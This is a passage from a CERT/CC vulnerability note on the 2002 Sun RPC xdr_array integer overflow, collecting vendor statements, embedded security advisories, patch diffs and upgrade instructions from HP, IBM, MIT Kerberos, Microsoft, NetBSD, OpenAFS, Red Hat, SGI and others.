PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ Hewlett-Packard Company\n\nNotified: July 29, 2002 Updated: August 01, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSOURCE: Hewlett-Packard Company \n\n\nRE: Potential RPC XDR buffer overflow \n \nAt the time of writing this document, Hewlett Packard is currently investigating the potential impact to HP's released perating System software products. \n \nAs further information becomes available HP will provide notice f the availability of any necessary \npatches through&gt;standard security bulletin announcements and be vailable from your normal HP Services support channel.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ IBM Corporation\n\nNotified: July 29, 2002 Updated: September 03, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nIBM is vulnerable to the above XDR Library issues in both the 4.3 and 5.1 releases of AIX. A temporary patch is currently available through an efix pacakge. Efixes are available from \n\n[ftp.software.ibm.com/aix/efixes/security](<http://ftp.software.ibm.com/aix/efixes/security>) \n \nSee the [README](<http://ftp.software.ibm.com/aix/efixes/security/README>) file in this directory for additional information on the efixes. \n \nThe following APARs will be available in the near future: \n \n\n\n> \nAIX 4.3.3: APAR #IY34194 ( available approx 10/1/2002 ) \nAIX 5.1.0: APAR #IY34158 ( available approx 10/16/2002 ) \n\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPreviously on 08/06/2002 IBM stated:\n\n \n\n\n> \nIBM has analyzed AIX with regard to the XDR vulnerability and found that the 4.3.3 and 5.1.0 releases are exposed. We are currently working on an efix package for this issue which will be available shortly. \n \nWe will update this statement when more information once the efixes are available. \n\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ MIT Kerberos Development Team\n\nNotified: August 02, 2002 Updated: August 02, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nPlease see <http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-001-xdr.txt>\n\nThe patch is available directly: \n \n<http://web.mit.edu/kerberos/www/advisories/2002-001-xdr_array_patch.txt> \n \nThe following detached PGP signature should be used to verify the authenticity and integrity of the patch: \n \n<http://web.mit.edu/kerberos/www/advisories/2002-001-xdr_array_patch.txt.asc>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \n \nMIT krb5 Security Advisory 2002-001 \n \n2002-08-02 \n \nTopic: Remote root vulnerability in MIT krb5 admin system \n \nSeverity: Remote user may be able to gain root access to a KDC host. \n \nSUMMARY \n======= \n \nThere is an integer overflow bug in the SUNRPC-derived RPC library \nused by the Kerberos 5 administration system that could be exploited \nto gain unauthorized root access to a KDC host. It is believed that \nthe attacker needs to be able to authenticate to the kadmin daemon for \nthis attack to be successful. No exploits are known to exist yet. \n \nIMPACT \n====== \n \nA remote attacker can potentially execute arbitrary code on the KDC \nwith the privileges of the user running the kadmin daemon (usually \nroot). This can lead to compromise of the Kerberos database. \n \nAFFECTED SOFTWARE \n================= \n \nAll releases of MIT Kerberos 5, up to and including krb5-1.2.5. \n \nFIXES \n===== \n \nApply the following patch to src/lib/rpc/xdr_array.c: \n \nIndex: xdr_array.c \n=================================================================== \nRCS file: /cvs/krbdev/krb5/src/lib/rpc/xdr_array.c,v \nretrieving revision 1.5 \ndiff -c -r1.5 xdr_array.c \n*** xdr_array.c1998/02/14 02:27:231.5 \n\\- --- xdr_array.c2002/08/02 17:25:05 \n*************** \n*** 75,81 **** \nreturn (FALSE); \n} \nc = *sizep; \n! if ((c &gt; maxsize) &amp;&amp; (xdrs-&gt;x_op != XDR_FREE)) { \nreturn (FALSE); \n} \nnodesize = c * elsize; \n\\- --- 75,82 ---- \nreturn (FALSE); \n} \nc = *sizep; \n! if ((c &gt; maxsize || c &gt; LASTUNSIGNED / elsize) \n! &amp;&amp; (xdrs-&gt;x_op != XDR_FREE)) { \nreturn (FALSE); \n} \nnodesize = c * elsize; \n \nand rebuild your tree. The patch was generated against krb5-1.2.5; \npatches to other releases may apply with some offset. \n \nThis patch may also be found at: \n \n_<http://web.mit.edu/kerberos/www/advisories/2002-001-xdr_array_patch.txt>_ \n \nThe associated detached PGP signature is at: \n \n_<http://web.mit.edu/kerberos/www/advisories/2002-001-xdr_array_patch.txt.asc>_ \n \nThis announcement and code patches related to it may be found on the \nMIT Kerberos security advisory page at: \n \n_<http://web.mit.edu/kerberos/www/advisories/index.html>_ \n \nThe main MIT Kerberos web page is at: \n \n_<http://web.mit.edu/kerberos/www/index.html>_ \n \nACKNOWLEDGMENTS \n=============== \n \nThanks to ISS for discovery of the vulnerability. \n \nThanks to Jeffrey Hutzelman for assistance in discovering the \nparticulars of this bug. \n \nDETAILS \n======= \n \nThe xdr_array() decoder computes the value of the NODESIZE variable in \na way that can lead to integer overflow. An attacker can construct an \nXDR encoding that will take advantage of this integer overflow in \norder to overflow the allocated heap buffer, depending on the \nspecifics of the caller of the xdr_array() function. \n \nThe uses of xdr_array() in the kadm5 library, which implements the \nKerberos 5 adminstration protocol, are unsafe in an environment where \nthis bug exists. A remote user may be able to use the buffer overflow \nto execute arbitrary code on the KDC host, possibly leading to \nunauthorized root access. It is believed that the remote user must \nfirst successfully authenticate to the kadmin daemon in order to \nexercise this vulnerability, though the user may not need to posess \nany special privileges. \n\\-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (SunOS) \n \niQCVAwUBPUrNEqbDgE/zdoE9AQHSPgQAlGS7HO8TZ1BHwek+niF5hA7exEt9Z8IA \nfvxGpqirHciJQTfmBUiJhXhCTqosFgftQzt9KyvXmfMS3InZxAEmB7ahkevuBYkO \nFvfWyA3Ew8J3bGhBJis1xTMFebb1N0crDH3rRjUGZApQ7uJNZ+9nQo41+P0+z3uD \nyqpAbP9HTnw= \n=MqNV \n\\-----END PGP SIGNATURE-----\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ Microsoft Corporation\n\nNotified: July 29, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nMicrosoft is currently conducting an investigation based on this report. We will update this advisory with information once it is complete.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see _<http://www.microsoft.com/technet/security/bulletin/ms02-057.asp>_\n\nStatement date: 10/2/2002 6:13:15 PM \n \n\\-----BEGIN PGP SIGNED MESSAGE----- \n \n\\- ---------------------------------------------------------------------- \nTitle: Flaw in Services for Unix 3.0 Interix SDK Could Allow \nCode Execution (Q329209) \nReleased: 02 October 2002 \nSoftware: Services for Unix 3.0 Interix SDK \nImpact: Buffer overrun and denial of service \nMax Risk: Moderate \nBulletin: MS02-057 \n \nMicrosoft encourages customers to review the Security Bulletin at: \n_<http://www.microsoft.com/technet/security/bulletin/MS02-057.asp>_. \n\\- ---------------------------------------------------------------------- \nIssue: \n====== \nAll three vulnerabilities discussed in this bulletin involve the \ninclusion of the Sun [TM] Microsystems RPC library in Microsoft's \nServices for UNIX (SFU) 3.0 on the Interix SDK. Developers who \ncreated applications or utilities using the Sun RPC library from \nthe Interix SDK need to evaluate three vulnerabilities. \n \nWindows Services for UNIX (SFU) 3.0 provides a full range of cross- \nplatform services to integrate Windows into existing UNIX environ- \nments. In version 3.0, the Interix subsystem technology is built in \nso that Windows Services for UNIX 3.0 can provide platform inter- \noperability and application migration in one fully integrated and \nsupported product from Microsoft. Developers who have integrated \nWindows into their existing UNIX environments may have used the \nInterix SDK to develop custom applications and utilities so that \napplications that only ran on the UNIX platform can now run in a \nWindows environment. Developers who used the Interix SDK to develop \napplications or utilities should read this bulletin. \n \nThe first vulnerability is an integer overflow in the XDR library \nthat ships with the Sun RPC library on the Interix SDK for \nMicrosoft's Services for Unix (SFU) 3.0. An attacker could send a \nmalicious RPC request to the RPC server from a remote machine and \ncause corruption in the server program. This can cause the server \nto fail and potentially allow the attacker to run code of his or \nher choice in the context of the server program. \n \nThe second vulnerability is a buffer overrun. An attacker could send \na malicious RPC request to the RPC server with an improper parameter \nsize check. This could lead to a buffer overrun, causing the server \nto fail and preventing it from servicing any further requests from \nclients. \n \nThe third vulnerability is an RPC implementation error. An app- \nLication using the Sun RPC library does not properly check the size \nof client TCP requests. This could result in a denial of service \nto a server application using the Sun RPC library. The RPC library \nexpects client TCP requests to specify the size of the record \nthat follows. Because there is a flaw in the way RPC detects \nclient packets, an attacker could send a malformed RPC request to \nthe RPC server from a remote machine and cause the server to fail \nby not servicing any further client requests. \n \nAfter applying the patch, it is necessary to recompile any Interix \napplication that is statically linked with the Interix SDK Sun RPC \nlibrary. \n \n \nMitigating Factors: \n==================== \n*Only applications or utilities that were created using the \nInterix SDK and specifically that use the Sun RPC library, \nwould be affected by these vulnerabilities. \n*If an administrator or developer has only installed the \nInterix SDK but has not actually created applications with \nthe SDK that use the Sun RPC library, the systems where the \nSDK was installed would not be vulnerable. \n \nRisk Rating: \n============ \n\\- Internet systems: Moderate \n\\- Intranet systems: Moderate \n\\- Client systems: Moderate \n \nPatch Availability: \n=================== \n\\- A patch is available to fix this vulnerability. Please read the \nSecurity Bulletin at \n_<http://www.microsoft.com/technet/security/bulletin/ms02-057.asp>_ \nfor information on obtaining this patch. \n \n\\- --------------------------------------------------------------------- \n \nTHE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED \n\"AS IS\" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL \nWARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF \nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT \nSHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY \nDAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, \nCONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF \nMICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE \nPOSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION \nOR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES \nSO THE FOREGOING LIMITATION MAY NOT APPLY. \n \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: PGP 7.1 \n \niQEVAwUBPZtve40ZSRQxA/UrAQHdXgf/ejvlfeHIg3/qqRNVr05cITb88aElEzmS \n54vEwb1h9YXhMzMBwm4nXyFLcG97wxJdWSUFkqKx8gzQtlJazOzCFHCKKCC1wU3Y \nteNZJY0D/xEgkRTaYeeEIqNqTq6646M4dHmhFlyfLPLz5Ak50lpeGAk3ZyMPnfl8 \nuhypyBCy+1CmuxQE3RNMHw2Orz5jIwKWVYRjhfgQH11U537rCCW2cePadxYoDVpz \nVyR1iHTDo5bvZa7101qMb06rftijbAKRF4049USw14dd6v/0FxxmjfXu2w9ECL1U \nzwvrt8MaOWRPw/vt+kbF7kRFIDSUVuTN4xlf2kSC+zIOKdluvelhgw== \n=Y+ML \n\\-----END PGP SIGNATURE-----\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ NetBSD\n\nNotified: July 29, 2002 Updated: September 20, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nPlease see `<ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-011.txt.asc>`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n` NetBSD Security Advisory 2002-011 \n================================= \n` \n`Topic:Sun RPC XDR decoder contains buffer overflow \n` \n`Version:NetBSD-current: source prior to August 1, 2002 \nNetBSD-1.6 beta: affected \nNetBSD-1.5.3: affected \nNetBSD-1.5.2: affected \nNetBSD-1.5.1: affected \nNetBSD-1.5: affected \nNetBSD-1.4.*: affected \n` \n`severity:Possible remote root compromise if RPC services \nare enabled \n` \n`Fixed:NetBSD-current:August 1, 2002 \nNetBSD-1.6 branch:August 2, 2002 (1.6 includes the fix) \nNetBSD-1.5 branch:August 1, 2002 \nNetBSD-1.4 branch:not yet \n` \n \n`Abstract \n======== \n` \n`Integer overflows exist in the RPC code in libc. These cause a buffer to \nbe mistakenly allocated too small, and then overflown. \n` \n`The Automounter amd(8) and its query tool amq(8), and the rusers(1) \nclient binary use the flawed code in a way which could be exploitable. \n` \n`Other uses of the RPC functions have been examined and are believed to \nnot be exploitable. \n` \n`No RPC-based services are enabled by default. \n` \n \n`Technical Details \n================= \n` \n`Sun RPC is a remote procedure call framework which allows clients \nto invoke procedures in a server process over a network somewhat \ntransparently. XDR is a mechanism for encoding data structures for \nuse with RPC. NFS, NIS, and many other network services are built \nupon Sun RPC. \n` \n`The NetBSD C runtime library (libc) contains an XDR encoder/decoder \nderived from Sun's RPC implementation. \n` \n`Any application using Sun RPC may be vulnerable to a heap buffer \noverflow. Depending upon the application, this vulnerability may be \nexploitable and lead to arbitrary code execution. \n` \n`An error in the calculation of memory needed for unpacking arrays in \nthe XDR decoder can result in a heap buffer overflow. \n` \n`Though no exploits are known to exist currently, RPC-based services \noften run as the superuser, and the vulnerability in amd(8) could be \nexploitable. \n` \n`Again, no RPC-based services are enabled by default. \n` \n \n`Solutions and Workarounds \n========================= \n` \n`The recent NetBSD 1.6 release is not vulnerable to this issue. A full \nupgrade to NetBSD 1.6 is the recommended resolution for all users able \nto do so. Many security-related improvements have been made, and \nindeed this release has been delayed several times in order to include \nfixes for a number of recent issues. \n` \n`If you do not run any of the affected RPC services (amd/amq/rusers) \nyour system is not affected. However, we suggest you upgrade your \nsystem to avoid running vulnerable RPC code by mistake. \n` \n`The following instructions describe how to upgrade your libc (which \nincludes RPC code) by updating your source tree and rebuilding and \ninstalling a new version of libc. \n` \n`Note that if you have any statically-linked binaries that uses RPC, \nyou need to recompile them. \n` \n`* NetBSD-current: \n` \n`Systems running NetBSD-current dated from before 2002-08-01 \nshould be upgraded to NetBSD-current dated 2002-08-01 or later. \n` \n`The following directories need to be updated from the \nnetbsd-current CVS branch (aka HEAD): \nlib/libc/rpc \n` \n`To update from CVS, re-build, and re-install libc: \n# cd src \n# cvs update -d -P lib/libc/rpc \n` \n`# cd lib/libc \n# make cleandir dependall \n# make install \n` \n \n`* NetBSD 1.6 beta: \n` \n`Systems running NetBSD 1.6 BETAs and Release Candidates should \nbe upgraded to the NetBSD 1.6 release. \n` \n`If a source-based point upgrade is required, sources from the \nNetBSD 1.6 branch dated 2002-08-02 or later should be used. \n` \n`The following directories need to be updated from the \nnetbsd-1-6 CVS branch: \nlib/libc/rpc \n` \n`To update from CVS, re-build, and re-install libc: \n# cd src \n# cvs update -d -P -r netbsd-1-6 lib/libc/rpc \n` \n`# cd lib/libc \n# make cleandir dependall \n# make install \n` \n \n`* NetBSD 1.5, 1.5.1, 1.5.2, 1.5.3: \n` \n`Systems running NetBSD-1.5 branch dated from before 2002-08-02 \nshould be upgraded to NetBSD-1.5 branch dated 2002-08-02 or later. \n` \n`The following directories need to be updated from the \nnetbsd-1-5 CVS branch: \nlib/libc/rpc \n` \n`To update from CVS, re-build, and re-install libc: \n# cd src \n# cvs update -d -P -r netbsd-1-5 lib/libc/rpc \n` \n`# cd lib/libc \n# make cleandir dependall \n# make install \n` \n \n`* NetBSD 1.4, 1.4.1, 1.4.2, 1.4.3: \n` \n`The advisory will be updated to include instructions to remedy \nthis problem for systems running the NetBSD-1.4 branch. \n` \n \n`Thanks To \n========= \n` \n`CERT for notification. \n` \n`Charles Hannum for scope analysis and commentary. \n` \n`FreeBSD security-officers. Parts of the advisory text are based on \nthe FreeBSD advisory. \n` \n`The NetBSD Release Engineering teams, for great patience and \nassistance in dealing with repeated security issues discovered \nrecently. \n` \n \n`Revision History \n================ \n` \n`2002-08-01Initial release \n2002-08-021.5/1.6 branch info \n2002-09-16Re-release with updated information \n` \n \n`More Information \n================ \n` \n`An up-to-date PGP signed copy of this release will be maintained at \n``<ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-011.txt.asc>`` \n` \n`Information about NetBSD and NetBSD security can be found at \n``<http://www.NetBSD.ORG/>`` and ``<http://www.NetBSD.ORG/Security/>``. \n` \n \n`Copyright 2002, The NetBSD Foundation, Inc. All Rights Reserved. \n` \n`$NetBSD: NetBSD-SA2002-011.txt,v 1.13 2002/09/16 05:17:55 dan Exp $ \n` \n \n`-----BEGIN PGP SIGNATURE----- \nVersion: 2.6.3ia \nCharset: noconv \n` \n`iQCVAwUBPYVqKj5Ru2/4N2IFAQGEYAP+K1lgLUVy/CrmvtRikjSv5UKYY4pAWAca \nfKwDpVlp/5q3kSc/b5NY7bgi7gUPVvbaW1v/PgfRIA47PBtAt7juvsnEDIO6IJ8M \n9rDwfrikYdShm0R5ejxyIfu1CwjD9gWOvJ2xYGQ7XW67tLPG3udwa1B1UhWeQTnK \n9OhEncw7mcw= \n=YcPw \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ OpenAFS\n\nUpdated: August 05, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nPlease see <http://www.openafs.org/pages/security/OPENAFS-SA-2002-001.txt>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n\\-----BEGIN PGP SIGNED MESSAGE-----\n\nOpenAFS Security Advisory 2002-001 \n \nTopic: Remote root vulnerability in OpenAFS servers \n \nIssued: 03-Aug-2002 \nLast Update: 03-Aug-2002 \nSeverity: High \nAffected: OpenAFS 1.0 - 1.2.5, OpenAFS 1.3.0 - 1.3.2 \n \nA remote user may be able to gain root access to an OpenAFS database \nserver or fileserver host. In addition, certain administrative clients \nmay be attacked if they make requests to a rogue server. \n \nSUMMARY \n======= \n \nThere is an integer overflow bug in the SUNRPC-derived RPC library \nused by OpenAFS that could be exploited to crash certain OpenAFS \nservers (volserver, vlserver, ptserver, buserver) or to obtain \nunauthorized root access to a host running one of these processes. \n \nIn addition, it is possible for a rogue server to attack certain \nadministrative clients (vos, pts, backup, butc, rxstat), but only \nif certain RPC requests are made to the rogue server. \n \nThe OpenAFS fileserver and cache manager (client) are not vulnerable \nto these attacks. No exploits are presently known to be available \nfor this vulnerability. \n \nIMPACT \n====== \n \nA remote attacker can potentially execute arbitrary code on an OpenAFS \nserver host with the privileges of the user running the OpenAFS server \nprocesses (usually root). This can lead to compromise of the OpenAFS \nadministrative databases, data stored on a compromised server, or \npossible root access on a server host. Once a server host has been \ncompromised, the attacker is able to obtain access to any other OpenAFS \nservers in the same cell. \n \nAFFECTED SOFTWARE \n================= \n \nAll releases of OpenAFS 1.0.x and 1.1.x. \nAll releases of OpenAFS 1.2.x, up to and including OpenAFS 1.2.5. \nAll releases of OpenAFS 1.3.x, up to and including OpenAFS 1.3.2. \n \nFIXES \n===== \n \nThe OpenAFS project recommends that all users upgrade to OpenAFS \n1.2.6 or newer. The latest stable OpenAFS release is always available \nfrom _<http://www.openafs.org/release/latest.html>_. \n \nNo update is presently available for the OpenAFS-unstable series. \n \nFor those who are unable to upgrade, apply the following patch to \ncorrect the XDR vulnerability, and rebuild your tree. \n \n=================================================================== \nRCS file: /cvs/openafs/src/rx/Makefile.in,v \nretrieving revision 1.4.2.1 \nretrieving revision 1.4.2.2 \ndiff -u -r1.4.2.1 -r1.4.2.2 \n\\- --- openafs/src/rx/Makefile.in2002/01/20 08:38:381.4.2.1 \n+++ openafs/src/rx/Makefile.in2002/08/02 02:45:141.4.2.2 \n@@ -38,7 +38,7 @@ \n# Generic xdr objects (or, at least, xdr stuff that's not newly defined for rx). \n# Really the xdr stuff should be in its own directory. \n# \n\\- -XDROBJS = xdr_arrayn.o xdr_rx.o xdr_afsuuid.o \n+XDROBJS = xdr.o xdr_array.o xdr_arrayn.o xdr_rx.o xdr_afsuuid.o \n \nRXOBJS = rx_clock.o rx_event.o rx_user.o rx_lwp.o rx.o rx_null.o rx_globals.o \\ \nrx_getaddr.o rx_misc.o rx_packet.o rx_rdwr.o rx_trace.o rx_conncache.o \\ \n=================================================================== \nRCS file: /cvs/openafs/src/rx/xdr.c,v \nretrieving revision 1.4 \nretrieving revision 1.5 \ndiff -u -r1.4 -r1.5 \n\\- --- openafs/src/rx/xdr.c2002/06/08 04:43:381.4 \n+++ openafs/src/rx/xdr.c2002/07/31 23:13:091.5 \n@@ -558,6 +558,8 @@ \nu_int size; \nu_int nodesize; \n \n\\+ if (maxsize &gt; ((~0) &gt;&gt; 1) - 1) maxsize = ((~0) &gt;&gt; 1) - 1; \n+ \n/* \n* first deal with the length since xdr strings are counted-strings \n*/ \n=================================================================== \nRCS file: /cvs/openafs/src/rx/xdr_array.c,v \nretrieving revision 1.4 \nretrieving revision 1.5 \ndiff -u -r1.4 -r1.5 \n\\- --- openafs/src/rx/xdr_array.c2001/08/08 00:03:571.4 \n+++ openafs/src/rx/xdr_array.c2002/07/31 23:13:091.5 \n@@ -84,7 +84,10 @@ \nregister caddr_t target = *addrp; \nregister u_int c; /* the actual element count */ \nregister bool_t stat = TRUE; \n\\- -register int nodesize; \n+register u_int nodesize; \n+ \n\\+ i = ((~0) &gt;&gt; 1) / elsize; \n\\+ if (maxsize &gt; i) maxsize = i; \n \n/* like strings, arrays are really counted arrays */ \nif (! xdr_u_int(xdrs, sizep)) { \n=================================================================== \nRCS file: /cvs/openafs/src/rx/xdr_arrayn.c,v \nretrieving revision 1.4 \nretrieving revision 1.5 \ndiff -u -r1.4 -r1.5 \n\\- --- openafs/src/rx/xdr_arrayn.c2001/08/08 00:03:571.4 \n+++ openafs/src/rx/xdr_arrayn.c2002/07/31 23:13:091.5 \n@@ -89,7 +89,10 @@ \nregister caddr_t target = *addrp; \nregister u_int c; /* the actual element count */ \nregister bool_t stat = TRUE; \n\\- -register int nodesize; \n+register u_int nodesize; \n+ \n\\+ i = ((~0) &gt;&gt; 1) / elsize; \n\\+ if (maxsize &gt; i) maxsize = i; \n \n/* like strings, arrays are really counted arrays */ \nif (! xdr_u_int(xdrs, sizep)) { \n=================================================================== \n \nThis patch may also be found at: \n \n_<http://www.openafs.org/security/xdr-updates-20020731.delta>_ \n \nThe associated detached PGP signature is at \n \n_<http://www.openafs.org/security/xdr-updates-20020731.delta.asc>_ \n \nIt was generated against OpenAFS 1.2.5, but should apply to earlier \nreleases, possibly with some offset. \n \nThis announcement and code patches related to it may be found on the \nOpenAFS security advisory page at: \n \n_<http://www.openafs.org/security/>_ \n \nThe main OpenAFS web page is at: \n \n_<http://www.openafs.org/>_ \n \nACKNOWLEDGMENTS \n=============== \n \nThanks to ISS for discovery of the vulnerability. \n \nThanks to Nickolai Zeldovich for assistance in discovering the \nparticulars of this bug and developing a fix. \n \nThanks also to Tom Yu and the MIT Kerberos Development Team for their \nadvisory MITKRB5-SA-2002-001, the form and much of the text of which \nwas shamelessly stolen to produce this alert. \n \nDETAIL \n====== \n \nThe xdr_array() decoder computes the value of the NODESIZE variable in \na way that can lead to integer overflow. An attacker can construct an \nXDR encoding that will take advantage of this integer overflow in \norder to overflow the allocated heap buffer, depending on the \nspecifics of the caller of the xdr_array() function. \n \nSeveral uses of xdr_array() in various AFS protocols are unsafe in an \nenvironment where this bug exists. In particular, any use of a \ncounted array with unbounded size (represented in the Rx protocol \ndescription with an empty pair of angle brackets '&lt;&gt;') is unsafe. Such \nuses appear in input arguments to procedures in the PTS, VLDB, volserver, \nand backup database protocols, and output arguments from procedures in all \nof these protocols and in the Rx statistics interface implemented by most \nOpenAFS servers. \n \nA remote user may be able to use the buffer overflow to execute arbitrary \ncode on the server under attack, possibly leading to unauthorized root \naccess. Similarly a rogue server may be able to use the buffer overflow \nto attack a client which makes one of the RPC's with unsafe output \narguments. \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: PGP 6.5.8 \n \niQBVAwUBPUxo8bD+655x7JNnAQGOYAH/ZzSzw5FyLI8YTmgJH4qSO7rKQVpy8F+L \naIU3Xy4HngBpYALsOrJLkCI7h966Li00YhyXgsm4UW9NzbCORc80Kw== \n=iILR \n\\-----END PGP SIGNATURE----- \n \n_______________________________________________ \nOpenAFS-announce mailing list \nOpenAFS-announce@openafs.org \n_<https://lists.openafs.org/mailman/listinfo/openafs-announce>_\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ OpenBSD\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nPlease see <http://www.openbsd.org/errata.html#xdr>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nCommon patches available here <ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/012_xdr.patch>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ Openwall GNU/*/Linux\n\nUpdated: August 06, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`The xdr_array(3) integer overflow was present in the glibc package on \nOpenwall GNU/*/Linux until 2002/08/01 when it was corrected for \nOwl-current and documented as a security fix in the system-wide change \nlog available at: \n`\n\n` ``<http://www.openwall.com/Owl/CHANGES.shtml>`` \n` \n`The same glibc package update also fixes a very similar but different \ncalloc(3) `[`integer overflow`](<http://CERT.Uni-Stuttgart.DE/advisories/calloc.php>)` possibility that is currently not known to \nallow for an attack on a particular application, but has been patched \nas a proactive measure. The Sun RPC xdr_array(3) overflow may allow \nfor passive attacks on mount(8) by malicious or spoofed NFSv3 servers \nas well as for both passive and active attacks on RPC clients or \nservices that one might install on Owl. (There're no RPC services \nincluded with Owl.)`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ Red Hat, Inc.\n\nNotified: July 29, 2002 Updated: August 05, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nRed Hat distributes affected packages glibc and Kerberos in all Red Hat Linux distributions. We are currently working on producing errata packages, when complete these will be available along with our advisory at the URLs below. At the same time users of the Red Hat Network will be able to update their systems using the 'up2date' tool. \n\n\n \n<http://rhn.redhat.com/errata/RHSA-2002-166.html> (glibc) \n<http://rhn.redhat.com/errata/RHSA-2002-172.html> (Kerberos 5) \n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ SGI\n\nNotified: July 29, 2002 Updated: August 19, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`Patches available per SGI Security Advisory `[`20020801-01-P`](<ftp://patches.sgi.com/support/free/security/advisories/20020801-01-P>)`.`\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n` \n`______________________________________________________________________________ \nSGI Security Advisory \n` \n` Title: Sun RPC xdr_array vulnerability \nNumber: 20020801-01-P \nDate: August 16, 2002 \nReference: CERT\u00ae CA-2002-25 \nReference: SGI Security Advisory 20020801-01-A \nReference: CAN-2002-0391 \n` \n`______________________________________________________________________________ \n` \n`- -----------------------` \n`- --- Issue Specifics --- \n- -----------------------` \n \n`This is a followup to SGI Security Bulletin 20020801-01-A. \n` \n`It's been reported that there is a buffer overflow vulnerability in the Sun \nRPC functions supplied with the IRIX 6.5 operating system. \n` \n`The portmapper, NFS and NIS RPC services do NOT use the relevant RPC XDR \nfunctions in libc in a manner that makes them vulnerable. But other RPC \nservices from IRIX, third-parties, freeware, etc. might use XDR functions. \n` \n`See ``<http://www.cert.org/advisories/CA-2002-25.html>`` and \n``<http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20823>`` \nfor additional details. \n` \n`SGI has investigated the issue and recommends the following steps for \nneutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be \nimplemented on ALL vulnerable SGI systems. \n` \n`These issues have been corrected in future releases of IRIX and with a \nseries of patches. \n` \n \n`- --------------` \n`- --- Impact --- \n- --------------` \n \n`The vulnerabilities exist within libc, which is installed by default on \nIRIX 6.5 systems as part of eoe.sw.base. \n` \n`To determine the version of IRIX you are running, execute the following \ncommand: \n` \n` # uname -R \n` \n`That will return a result similar to the following: \n` \n` # 6.5 6.5.16f \n` \n`The first number (\"6.5\") is the release name, the second (\"6.5.16f\" in \nthis case) is the extended release name. The extended release name is \nthe \"version\" we refer to throughout this document. \n` \n`This vulnerability was assigned the following CVE: \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0391>`` \n` \n`This vulnerability was assigned the following 